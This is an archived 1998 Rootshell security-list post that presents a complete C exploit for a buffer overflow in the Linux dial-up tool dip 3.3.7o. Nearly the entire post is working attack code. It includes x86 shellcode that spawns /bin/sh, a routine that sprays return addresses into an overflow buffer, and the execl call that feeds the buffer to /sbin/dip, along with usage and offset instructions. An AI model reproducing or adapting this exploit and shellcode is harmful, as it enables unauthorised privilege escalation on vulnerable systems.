home *** CD-ROM | disk | FTP | other *** search
-
- [ http://www.rootshell.com/ ]
-
- From jamez@uground.org Thu May 7 16:25:54 1998
- Date: Thu, 07 May 1998 20:13:55 +0000
- From: jamez <jamez@uground.org>
- To: www-request@rootshell.com
- Subject: dip 3.3.7o exploit
-
- hi there, there's an exploit for dip 3.3.7 buffer overflow. Tested on
- Slackware 3.4.
- (7 May 1998)
-
- ---- cut here ----
-
- /*
- dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
- coded by jamez. e-mail: jamez@uground.org
-
- thanks to all ppl from uground.
-
- usage:
- gcc -o dip-exp dip3.3.7o-exp.c
- ./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
- */
-
-
- char shellcode[] =
-
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
-
- "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
- "\x80\xe8\xdc\xff\xff\xff/bin/sh";
-
-
- #define SIZE 130
- /* cause it's a little buffer, i wont use NOP's */
-
- char buffer[SIZE];
-
-
- unsigned long get_esp(void) {
- __asm__("movl %esp,%eax");
- }
-
-
- void main(int argc, char * argv[])
- {
- int i = 0,
- offset = 0;
- long addr;
-
-
- if(argc > 1) offset = atoi(argv[1]);
-
- addr = get_esp() - offset - 0xcb;
-
- for(i = 0; i < strlen(shellcode); i++)
- buffer[i] = shellcode[i];
-
- for (; i < SIZE; i += 4)
- {
- buffer[i ] = addr & 0x000000ff;
- buffer[i+1] = (addr & 0x0000ff00) >> 8;
- buffer[i+2] = (addr & 0x00ff0000) >> 16;
- buffer[i+3] = (addr & 0xff000000) >> 24;
- }
-
- buffer[SIZE - 1] = 0;
-
- execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
- }
-
